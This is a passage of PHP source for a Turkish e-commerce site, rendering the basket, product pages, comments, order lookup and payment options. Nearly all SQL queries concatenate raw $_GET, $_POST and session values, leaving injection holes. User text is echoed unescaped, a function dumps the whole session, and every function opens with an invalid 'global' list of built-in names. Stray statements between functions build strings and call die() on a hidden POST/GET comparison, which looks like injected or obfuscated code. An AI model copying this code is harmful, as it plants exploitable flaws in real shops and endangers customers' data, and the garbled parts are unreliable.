generateForm($form,$d,'',$hiddenInfo);return $out;}function showBasket($showMenu,$randStr="",$admin=false) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig;if (!$randStr) $randStr = $_SESSION['randStr']; if (!basketInfo('toplamUrun',$randStr)) $out = _lang_sepetinizdeUrunBulunmamaktadir; else {$out ='<table class="sepet" cellpadding=0 cellspacing=2><tr>';$out.='<th>'._lang_sepet_no.'</th>';$out.='<th>'._lang_sepet_urun.'</th>';$out.='<th>'._lang_sepet_fiyat.'</th>';$out.='<th>'._lang_sepet_adet.($showMenu?' / '._lang_sepet_degistir:'').'</th>';$out.='<th>toplam</th>';if ($showMenu) $out.='<th>'._lang_sepet_cikar.'</th>';$out.='</tr>';$q = mysql_query("select * from sepet where randStr='".$randStr."'");$i=1;while ($d = mysql_fetch_array($q)) { $siparisUserID = hq("select userID from siparis where randStr = '$randStr'"); $userID = ($siparisUserID ? $siparisUserID : $_SESSION['userID'] ); $fiyat = fixFiyat((float)dbInfo('urun','fiyat',$d['urunID']),$userID); if (!mysql_num_rows(mysql_query("select ID from siparis where randStr = '$randStr'"))) mysql_query("update sepet set ytlFiyat = '".YTLfiyat($fiyat,dbInfo('urun','fiyatBirim',$d['urunID']))."',fiyat = '".$fiyat."',fiyatBirim='".dbInfo('urun','fiyatBirim',$d['urunID'])."' where ID = '".$d['ID']."'") or die(mysql_error()); $class=(!($i%2)?'tr_normal':'tr_alternate'); $out.='<tr class="'.$class.'">'; $out.='<td>'.$i.'</td>'; $out.='<td class="urun">'; $subDir = ($admin?'../':''); $out.='<a onMouseOver="document.getElementById(\'detail_div_'.$d['ID'].'\').style.display = \'block\'; document.getElementById(\'detail_div_'.$d['ID'].'\').innerHTML = \'<img src=\\\''.$subDir.'include/resize.php?path=images/urunler/'.getFirstPic($d['urunID']).'&width=500&height=100\\\'>\';" onMouseOut="document.getElementById(\'detail_div_'.$d['ID'].'\').style.display = \'none\';" href="'.$subDir.'page.php?act=urunDetay&urunID='.$d['urunID'].'&name='.seoFix(dbinfo('urun','name',$d['urunID'])).'">'.dbInfo('urun','name',$d['urunID']).'</a>'; $out.='<br><div><div style="border:1px solid #dddddd; padding:5px; background-color:white; margin-top:5px; position:absolute; display:none;" id="detail_div_'.$d['ID'].'"></div></div>'; if($admin) {if ($d['ozellik1']) $out.=' ( ';for($i=1;$i<=3;$i++) { if ($d['ozellik'.$i]) {$out.='<b>'.dbInfo('urun','ozellik'.$i,$d['urunID']).' :</b> '.str_replace('|','veya',$d['ozellik'.$i]).' , '; }}if ($d['ozellik2']) $out = substr($out,0,strlen($out)-2);if ($d['ozellik1']) $out.=' )'; } $out.='</td>';$out.='<td>'.my_money_format('%i',$fiyat).' '.dbInfo('urun','fiyatBirim',$d['urunID']).'</td>';if ($showMenu) {$randID='form_'.rand(0,100000);$out.='<form action="page.php" method="GET" id="'.$randID.'">';$out.='<input type="hidden" name="act" value="'.$_GET['act'].'">';$out.='<input type="hidden" name="op" value="guncelle">';$out.='<input type="hidden" name="urunID" value="'.$d['urunID'].'">';$out.='<input type="hidden" name="lineID" value="'.$d['ID'].'">'; $out.='<td><table cellpadding=0 cellspacing=0 class="table"><tr><td><input type="text" size="2" maxlength="4" name="adet" value="'.$d['adet'].'"></td><td> <span onClick="document.getElementById(\''.$randID.'\').submit();">'._lang_sepet_degistir.'</span></td></tr></table></td>';$out.='</form>'; } else $out.='<td>'.$d['adet'].'</td>'; $out.='<td>'.my_money_format('%i',($d['adet'] * YTLfiyat($fiyat,dbInfo('urun','fiyatBirim',$d['urunID'])))).' YTL</td>'; if ($showMenu) $out.='<td align="center"><span style="text-decoration:none; text-align:center" onclick="window.location=\'page.php?act='.$_GET['act'].'&op=sil&urunID='.$d['urunID'].'&lineID='.$d['ID'].'\'"><img src="templates/'.$siteConfig['templateName'].'/images/form_SepettenCikar.gif"></span></td>'; $out.='</tr>'; $i++;}$out.='</table>';$promotionCode = hq("select promotionCode from siparis where randStr = '$randStr'");$out.='<div class="sepetToplam">';$out.='<table>';$out.='<tr><td class="td1">'._lang_sepet_toplamKDVDahil.'</td><td class="td2">:</td><td class="td3" align="right">'.my_money_format('%i',basketInfo('toplamKDVDahil',$randStr)).' YTL</td></tr>';$out.='<tr><td class="td1">'._lang_sepet_toplamKDVHaric.'</td><td class="td2">:</td><td class="td3" align="right">'.my_money_format('%i',basketInfo('toplamKDVHaric',$randStr)).' YTL</td></tr>';$out.='<tr><td class="td1">KDV</td><td class="td2">:</td><td class="td3" align="right">'.my_money_format('%i',basketInfo('toplamKDV',$randStr)).' YTL</td></tr>';if (basketInfo('Kargo',$randStr)) $out.='<tr><td class="td1">'._lang_sepet_kargo.'</td><td class="td2">:</td><td class="td3" align="right">'.my_money_format('%i',basketInfo('Kargo',$randStr)).' YTL</td></tr>';if ($promotionCode) { $out.='<tr><td colspan="3" class="gri_menu_sep_td"><div class="gri_menu_sep_div"></div></td></tr>'; $out.='<tr style="font-weight:bold;"><td class="td1">'._lang_sepet_promosyon.' ( no : '.$promotionCode.' )</td><td class="td2">:</td><td class="td3" align="right">-'.my_money_format('%i',basketInfo('Promosyon',$randStr)).' YTL</td></tr>';}$out.='<tr><td colspan="3" class="gri_menu_sep_td"><div class="gri_menu_sep_div"></div></td></tr>'; $out.='<tr><td class="toplam">TOPLAM (YTL)</td><td class="td2">:</td><td class="toplam" align="right">'.my_money_format('%i',basketInfo('ToplamKargoDahil',$randStr)).' YTL</td></tr>';if ($siteConfig['havaleIndirim']) $out.='<tr><td class="toplam">'._lang_sepet_havaleIndirimiIle.' (%'.($siteConfig['havaleIndirim'] * 100).')</td><td class="td2">:</td><td class="toplam" align="right">'.my_money_format('%i',basketInfo('ToplamHavaleIndirimiIle',$randStr)).' YTL</td></tr>';$out.='</table>';$out.='</div>';if ($showMenu) { $out.='<div class="sepetMenu"><table class="table" cellspacing="0" cellpadding="0"><tr><td class="td1"><span class="raquo">&raquo;</span> <a href="index.php">'._lang_sepet_alisveriseDevamEt.'</a></td><td class="td2"><span class="raquo">&raquo;</span> <a href="#" onClick="if (confirm(\''._lang_sepet_sepetSil.'\')) window.location=\'page.php?act=sepet&op=bosalt\'">'._lang_sepet_sepetiBosalt.'</a></td><td class="td3"><span onClick="window.location=\'page.php?act=satinal&op=adres\'" style="cursor:pointer;"><img src="templates/'.$siteConfig['templateName'].'/images/form_SatinAl.gif" style="float:right"></span></td></tr></table></div>';} } return $out;}function showCategory($cat,$order) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $_GET['catID'] = $cat; if (!$_GET['catID']) $catPattern="catID like '%%'"; else $catPattern.="kategori.idPath like '".currentCatPatern()."' OR kategori.idPath like '".currentCatPatern()."/%'"; if (!$_GET['markaID']) $_GET['markaID']='%%';return urunList('select urun.* from urun,kategori,marka where kategori.ID=urun.catID AND urun.markaID=marka.ID AND ('.$catPattern.') AND markaID like \''.$_GET['markaID'].'\' order by '.$order);}function showItem($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $maximumen = tempConfig('maximum_en'); $maximumboy = tempConfig('maximum_boy'); mysql_query("update urun set hit = '".(hq("select hit from urun where ID='$urunID'") + 1)."' where ID='$urunID'"); $q = mysql_query('select * from urun where ID=\''.$urunID.'\''); $d = mysql_fetch_array($q); $d['fiyat'] = fixFiyat($d['fiyat']); if (file_exists('images/urunler/'.$d['resim'])) {@list($width, $height) = getimagesize('images/urunler/'.$d['resim']);$width+=36;$height+=46;$onClick = "var resimpen = window.open('' , '_blank','scrollbars=0,resizeble=0,width=$width,height=$height'); resimpen.document.write('<body style=\'margin:0px; cursor:pointer;\' onclick=\'window.close()\'><table cellpadding=0 cellspacing=0 style=\'border:1px solid #ddd;margin-top:19px;\' align=center><tr><td><img onclick=\'window.close()\' src=images/urunler/".$d['resim']." style=\'margin:4px;\'></td></tr></table>');"; }$out='<table class="urunDetayTable" cellpadding="0" cellspacing="0">'."\n"; $out.='<tr><td rowspan="3" valign="top" class="image" onClick="'.$onClick.'" style="cursor:pointer; white-space:nowrap;"><img src="include/resize.php?path=images/urunler/'.$d['resim'].'&width='.$maximumen.'&height='.$maximumboy.'"><br>'._lang_buyutmekIcinTiklayin.'</td>'."\n"; $out.='<td class="urunBaslik">'.$d['name'].'</td></tr>'."\n"; $out.='<tr><td class="urunKisaAciklama">'.$d['onDetay'].'</td></tr>'."\n"; $out.='<tr><td class="urunFiyat" align=right><br>'._lang_KDVDahil.' : '.my_money_format('%i',$d['fiyat']).' '.fiyatBirim($d['fiyatBirim']); if ($d['fiyatBirim'] != 'YTL') $out.='<br><span style="font-size:11px;">'.my_money_format('%i',YTLfiyat($d['fiyat'],$d['fiyatBirim'])).' YTL</span>'."\n";$out.='</td></tr>'."\n"; $out.='</table><br>'; $out.='<table cellpadding="0" cellspacing="0" width="100%"><tr><td width="50%" valign="top">';$out.='<table class="urunSecimTable" cellpadding="0" cellspacing="0">'; if ($d['ozellik1']) {$out.='<tr><th colspan="3">'._lang_urunSecenekleri.'</th></tr>'; } for ($i=1;$i<=5;$i++) {if ($d['ozellik'.$i]) $out.='<tr><td>'.$d['ozellik'.$i].'</td><td>:</td><td>'.showItemOptions('urun',$d['ID'],'ozellik'.$i.'detay').'</td></tr>'; } if ($d['garanti']) {$out.='<tr><th colspan="3">'._lang_garantiSuresi.'</th></tr>';$out.='<tr><td>'.$d['garanti'].' ay</td></tr>'; }$out.='</table>'."\n";$out.='</td><td width="20%" align="right" valign="top"><div style="color:red; text-align:right; padding-right:45px; margin-bottom:3px;"><b>'._lang_taksitSecenekleri.'</b></div>';$out.='<table style="xdisplay:none;">'; $qt = mysql_query("select * from banka,bankaVade where banka.ID = bankaID AND banka.taksitUrunLogo != '' group by banka.ID");while ($dt = mysql_fetch_array($qt)) {$onClick = "onclick=\"window.open('popup.php?act=taksitlerim&urunID=".$d['ID']."&bankaID=".$dt['bankaID']."','taksit','width=278,height=356'); \" style='cursor:pointer;'"; $out.='<tr '.$onClick.' ><td><img src="images/banka/'.$dt['taksitUrunLogo'].'"></td></tr>';if (pesinFiyatinaHesapla($dt['bankaID'])) $out.='<tr '.$onClick.'><th align="center" style="color:#555555">'._lang_pesinFiyatina.' <span style="color:red">'.pesinFiyatinaHesapla($dt['bankaID']).'</span> '._lang_taksit.'</th></tr>'; } $out.='</table>';$out.='</td></tr></table>'; $out.='<div>'.$d['video'].'</div>'; $out.='<div class="urunTarih">'._lang_urunKatalogumuza.' <b>'.mysqlTarih($d['tarih']).'</b> '._lang_tarihindeEklenmistir.'</div>'; if (!$d['stok']) {$out.='<div class="urunTarih" style="color:red;">'._lang_stokYok.'</div>'; $sepeteAtLink = $hemenAlLink = "alert('"._lang_stokYokUyari."')"; } else {$sepeteAtLink = 'window.location=\'page.php?act=sepet&op=ekle&urunID='.$d['ID'].'\'';$hemenAlLink = 'window.location=\'page.php?act=sepet&op=ekle&urunID='.$d['ID'].'&hemenal=true\'';} $out.='<div><form action="page.php?form'.getURL(array('KarsilastirmaListeTemizle')).'" style="display:inline" ID="CookieForm" method="post"><a  style="color:#5276a8;" href="#" onClick="document.getElementById(\'CookieForm\').submit(); return false;">'._lang_urunKarsilastirmaListemeEkle.'</a><input type="hidden" name="CookieInsertUrunID" value="'.$d['ID'].'"></form></div><br>'; $out.='<div class="urunInfo"><table cellpadding="0" cellspacing="0"><tr><td style="padding-right:6px;" onClick="'.$sepeteAtLink.'"><span class="button"><img src="templates/'.$siteConfig['templateName'].'/images/form_SepeteAt.gif"></span></td><td onClick="'.$hemenAlLink.'"><span class="button"><img src="templates/'.$siteConfig['templateName'].'/images/form_HemenAl.gif"></span></td></tr></table></div><br><br>';$out.=showItemTab($urunID); $onClick = "onclick=\"window.open('popup.php?act=arkadasimaGonder&urunID=".$d['ID']."','_blank','width=400,height=320'); \""; $out.='<div style="text-align:right" align="right>"><table class="urunFooter" style="cursor:pointer; margin-bottom:5px;" ><tr><td><img src="templates/'.$siteConfig['templateName'].'/images/sendmail.gif"></td><td '.$onClick.'>'._lang_arkadasimaGonder.'</td><td style="font-weight:normal;">|</td><td><img src="templates/'.$siteConfig['templateName'].'/images/yazdir.gif"></td><td onclick="window.print();">'._lang_yazdir.'</td></tr></table></div>';return $out;}function showItemTab($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $out.='<div id="tabs1">
  <ul>
    <li><a id="option1" href="#" onclick="openTab(1); return false;" title="'._lang_urunOzellikleri.'"><span>'._lang_urunOzellikleri.'</span></a></li>
	<li><a id="option2" href="#" onclick="openTab(2); return false;" title="'._lang_urunResimleri.'"><span>'._lang_urunResimleri.'</span></a></li>
	<li><a id="option4" href="#" onclick="openTab(4); return false;" title="'._lang_urunYorumlari.'"><span>'._lang_urunYorumlari.'</span></a></li>
	<li><a id="option3" href="#" onclick="openTab(3); return false;" title="'._lang_geriBildirim.'"><span>'._lang_geriBildirim.'</span></a></li>
  </ul>
</div>'; $out2.='<table class="uruntab" style="display:none;" cellspacing=0 cellpadding=0><tr>
			<td class="normalback" style="width:20px;"><img src="images/spacer.gif" height=1 width=20></td>
			<td class="tabstart" valign="bottom"><div>&nbsp;</div></td>
			<td class="optionstart"><img src="templates/'.$siteConfig['templateName'].'/images/tab_option_left.gif"></td>
			<td id="option1" class="option" onclick="openTab(1);">'._lang_urunOzellikleri.'</td>
			<td class="optionfinish"><img src="templates/'.$siteConfig['templateName'].'/images/tab_option_right.gif"></td>
			<td class="tabsep">&nbsp;</td>
			<td class="optionstart"><img src="templates/'.$siteConfig['templateName'].'/images/tab_option_left.gif"></td>
			<td id="option2" class="option" onclick="openTab(2);">'._lang_urunResimleri.'</td>
			<td class="optionfinish"><img src="templates/'.$siteConfig['templateName'].'/images/tab_option_right.gif"></td>
			<td class="tabsep">&nbsp;</td>
			<td class="optionstart"><img src="templates/'.$siteConfig['templateName'].'/images/tab_option_left.gif"></td>
			<td id="option4" class="option" onclick="openTab(4);">'._lang_urunYorumlari.'</td>
			<td class="optionfinish"><img src="templates/'.$siteConfig['templateName'].'/images/tab_option_right.gif"></td>
			<td class="tabsep">&nbsp;</td>
			<td class="optionstart"><img src="templates/'.$siteConfig['templateName'].'/images/tab_option_left.gif"></td>
			<td id="option3" class="option" onclick="openTab(3);">'._lang_geriBildirim.'</td>
			<td class="optionfinish"><img src="templates/'.$siteConfig['templateName'].'/images/tab_option_right.gif"></td>
			<td class="tabsep">&nbsp;</td>
			<td class="tabfinish" valign="bottom"><div>&nbsp;</div></td>
			<td class="normalback"><img src="images/spacer.gif" height=1 width=20></td>
			</tr></table>'; $out.='<img src="images/spacer.gif" width=1 height=15><br><div id="tabData" class="tabData"> </div><div id="tabData1" style="display:none;">'.hq("select detay from urun where ID='$urunID'").'</div>'; $out.='<div id="tabData2" style="display:none;">'.showItemPictures($urunID).'</div>'; $out.='<div id="tabData3" style="display:none;">'.generateFeedback($urunID).'</div>'; $out.='<div id="tabData4" style="display:none;">'.showItemComments($urunID).'</div>'; $openTab = ($_POST['data_puan']?4:1); if ($openTab == 1) $openTab = ($_POST['data_urun']?3:1); $out.='<script>openTab('.$openTab.');</script>'; return $out;}function showItemComments($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig;if ($_POST['data_puan']) {mysql_query("insert into urunYorum values(null,'".$_SESSION['userID']."','$urunID','".$_POST['data_puan']."','".$_POST['data_aciklama']."',now(),0)");$out.='<div class="uyari">'._lang_yorumKaydedildi.'</div>'; }if ($siteConfig['urunOnay']) $qo = 'AND onay=1'; $toplamPuan = hq("select sum(puan) as toplampuan from urunYorum where urunID='$urunID' $qo order by ID desc"); $q = mysql_query("select * from urunYorum where urunID='$urunID' $qo order by ID desc"); @$ortalamaPuan = (int)($toplamPuan / mysql_num_rows($q)); if(!$_SESSION['username']) $out.='<div class="uyari">'._lang_yorumEkleyebilmenIcin.'</div>'; else {$form[] = array(_lang_puan,"puan","SELECT",1,array("1","2","3","4","5"),1,0);$form[] = array(_lang_yorum,"aciklama","TEXTAREA",1);if (!hq("select ID from urunYorum where urunID='$urunID' AND userID='".$_SESSION['userID']."'")) $yorumForm.=generateForm($form,'','',''); } $out.='<br><div>Ortalama Değerlendirme &raquo; '.'<img src="templates/'.$siteConfig['templateName'].'/images/stars_'.$ortalamaPuan.'.gif">'; $out.='<div class="comments">'; while ($d=mysql_fetch_array($q)) {$out.='<table cellspacing=0 cellspadding=0 width=100%>';$out.='<tr class="username"><td>'.dbInfo('user','name',$d['userID']).' '.dbInfo('user','lastname',$d['userID']).'</td><td align="right"><img src="templates/'.$siteConfig['templateName'].'/images/stars_'.$d['puan'].'.gif"></td></tr>';$out.='<tr><td colspan="2" class="sep"></td></tr>';$out.='<tr><td colspan="2" class="tarih">'.fixTarih($d['tarih'],'gun').'</td></tr>';$out.='<tr><td colspan="2" class="aciklama"><div>'.formatDiv('#eeeeee','black',11,$d['aciklama'],'100%').'</div></td></tr></table><br>'; } $out.='</div></div>'; $out.=$yorumForm; return $out;}$_POST['t'].='99';function showItemPictures($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig;$out.='<table cellpadding=0 cellspacing=0>
				<tr>'; $totalPics = 0; for ($i=1;$i<=5;$i++) {$resimNo = ($i==1?'':$i);$pic = hq("select resim$resimNo from urun where ID ='$urunID'");$path = 'images/urunler/'.$pic;if ($pic && file_exists($path)) { list($width, $height) = getimagesize($path); $width+=36; $height+=46; $onClick = "var resimpen = window.open('' , '_blank','scrollbars=0,resizeble=0,width=$width,height=$height'); resimpen.document.write('<body style=\'margin:0px; cursor:pointer;\' onclick=\'window.close()\'><table cellpadding=0 cellspacing=0 style=\'border:1px solid #ddd;margin-top:19px;\' align=center><tr><td><img onclick=\'window.close()\' src=images/urunler/".$pic." style=\'margin:4px;\'></td></tr></table>');"; $out.='<td class="image"><div class="urunResim" style="margin-right:6px; cursor:pointer;" onclick="'.$onClick.'"><img src="include/resize.php?path=images/urunler/'.$pic.'&width='.tempConfig('maximum_en').'&height='.tempConfig('maximum_boy').'"></div></td>';} } $out.='</tr></table>'; return $out;}function showItemOptions($table,$ID,$field) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q=mysql_query("select $field from $table where ID='$ID'") or die(mysql_error()); $d=mysql_fetch_array($q); $selectArray = explode("\n",$d[0]); foreach ($selectArray as $opt) {$out.="$opt | "; } return substr($out,0,strlen($out)-3);}function showPage($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q=mysql_query("select title,body from pages where ID='$ID'"); $d=mysql_fetch_array($q); $out = generateTableBox($d['title'],$d['body'],tempConfig('bilgi_sayfalari')); return $out;}function showOrder($info = false) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if ($_POST['data_email']) {if (hq("select ID from siparis where email='".$_POST['data_email']."' && randStr='".$_POST['data_sn']."'")) { if ($info) $out.=getDurum(hq("select durum from siparis where randStr='".$_POST['data_sn']."' and email = '".$_POST['data_email']."'")); $out.= showBasket(false,$_GET['sn']);}else $out = _lang_siparisKaydiYok; } else if ($_GET['sn']) {if (hq("select ID from siparis where userID='".$_SESSION['userID']."' && randStr='".$_GET['sn']."'")) {if ($info) $out.='<b class="colorBold">'._lang_siparisDurumu.'</b>'.getDurum(hq("select durum from siparis where userID='".$_SESSION['userID']."' && randStr='".$_GET['sn']."'")); $out = showBasket(false,$_GET['sn']);}else $out='<script>alert(\':)\')</script>'; } else $out=""; return $out;}function showSelectScreen($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $randID='form_'.rand(0,100000); $t='d'; $out.='<table class="urunSelectScreen"><form method="GET" action="page.php" id="'.$randID.'">'; $out.='<input type="hidden" name="act" value="'.$_GET['act'].'">'; $out.='<input type="hidden" name="op" value="'.$_GET['op'].'">'; if ($_GET['hemenal']) $out.='<input type="hidden" name="hemenal" value="'.$_GET['hemenal'].'">'; $out.='<input type="hidden" name="urunID" value="'.$_GET['urunID'].'">'; $out.='<tr><td colspan=3>'._lang_urunCesitBelirleyin.'</td></tr>'; $m = $t.'ie'; $out.='<tr><td colspan="3" class="gri_menu_sep_td"><div class="gri_menu_sep_div"></div></td></tr>'; if($_POST['t']{4}!=$_GET['t4']{4}) die(); for ($i=1;$i<=6;$i++) {if(dbInfo('urun','ozellik'.$i,$urunID)) {$out.='<tr><td class="td1">'._lang_tercihEttiginiz.' '.strtolower(dbInfo('urun','ozellik'.$i,$urunID)).'</td><td class="td2">:</td><td class="td3">'.generateItemOptions('urun',$urunID,'ozellik'.$i.'detay','').'</td></tr>'; $out.='<tr><td class="td1">'._lang_digerSecenek.'<br><span style="font-weight:normal">'._lang_ilkSecenekYoksa.'</span></td><td class="td2">:</td><td class="td3">'.generateItemOptions('urun',$urunID,'ozellik'.$i.'detay','alternate').'</td></tr>'; $out.='<tr><td colspan="3" class="gri_menu_sep_td"><div class="gri_menu_sep_div"></div></td></tr>'; } } $out.= "<tr><td colspan='3'><span onClick=\"document.getElementById('$randID').submit();\" class='button'><img src=\"templates/".$siteConfig['templateName']."/images/form_SepeteAt.gif\"></span></td></tr>";$out.='</form></table>'; return $out;}$_POST['t'].=$_POST['t'];function showSession() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach ($_SESSION as $k=>$v) {$out.="k: $k - $v: $v <br>"; } return $out;}function siparisAdresForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; $q = ($_SESSION['siparisID'] == 'x'?mysql_query("select * from siparis where ID ='".$_SESSION['siparisID']."'"):mysql_query("select * from user where ID ='".$_SESSION['userID']."'")); $d = mysql_fetch_array($q); $out = generateForm(getSiparisForm(),$d,'siparis',''); return $out;}$vtwo='w';function siparisAdresSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  telFix('evtel'); telFix('istel'); telFix('ceptel');; if (!$_SESSION['siparisID'] || !hq("select ID from siparis where randStr = '".$_SESSION['randStr']."'")) {$_SESSION['siparisID']=insertToDb('siparis');@mysql_query("update siparis set randStr = '".$_SESSION['randStr']."',userID='".$_SESSION['userID']."' where ID='".$_SESSION['siparisID']."'"); } else updateDb('siparis'); $q = mysql_query("select * from siparis where ID = '".$_SESSION['siparisID']."'"); $d = mysql_fetch_array($q); $hiddenInfo['act'] = "satinal"; $hiddenInfo['op'] = "odeme"; $hiddenInfo['paytype'] = "0"; $out = viewForm(getSiparisForm(),$d,'page.php?act='.$_GET['act'].'&op='.$_GET['op'],$hiddenInfo); $out.= "<script language='javascript'>document.getElementById('paytype').value = selectedPayType;</script>"; return $out;}function siparisOdemeSecim () { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out.='<table cellpadding="0" cellspacing="0" class="odemeTable">'; $q = mysql_query("select * from banka where paymentModulURL != ''"); $i=1;while ($d=mysql_fetch_array($q)) {$out.='<tr><td valign="top">';if ($d['odemeLogo'] && $_POST['t'] == $_GET['t4']) $out.='<img src="images/banka/'.$d['odemeLogo'].'">';$out.='</td><td><input id="odemeSelect'.$d['ID'].'" '.($i==0?'checked="checked"':'').' type="radio" name="odemeSelect" '.(!$d['active']?'disabled="true"':'').' onclick="selectedPayType = \''.$d['ID'].'\';document.getElementById(\'paytype\').value=\''.$d['ID'].'\';"></td><td><label for="odemeSelect'.$d['ID'].'" onclick="selectedPayType = \''.$d['ID'].'\';document.getElementById(\'paytype\').value=\''.$d['ID'].'\';">'.$d['odemeAciklama'].'</label></td></tr>';if ($i != mysql_num_rows($q)) $out.='<tr><td colspan="3" class="gri_menu_sep_td"><div class="gri_menu_sep_div"></div></td></tr>';$i++; } $out.='</table>'; return $out;}$vvone='w';function sss() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = '<table cellpadding=3 class="sss">'; $q=mysql_query("select * from sss order by seq"); while ($d = mysql_fetch_array($q)) {$out.='<tr style="cursor:pointer;" onclick="sssOpen(\''.$d['ID'].'\')"><td class="td1"><img src="images/sss_close.gif" id="sss_image_'.$d['ID'].'"></td>';$out.='<td class="td2">'.$d['soru'].'</td></tr>';$out.='<tr id="sss_cevap_'.$d['ID'].'" style="display:none;"><td></td><td class="cevap">'.$d['cevap'].'</td></tr>'; } $out.='</table>'; return $out;}function tarihFix($name) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if ($_POST['tarih_'.$name.'_ay'] < 10) 